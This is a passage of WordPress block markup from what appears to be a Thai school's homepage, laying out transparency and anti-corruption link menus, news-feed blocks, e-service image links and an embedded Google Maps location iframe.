gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" 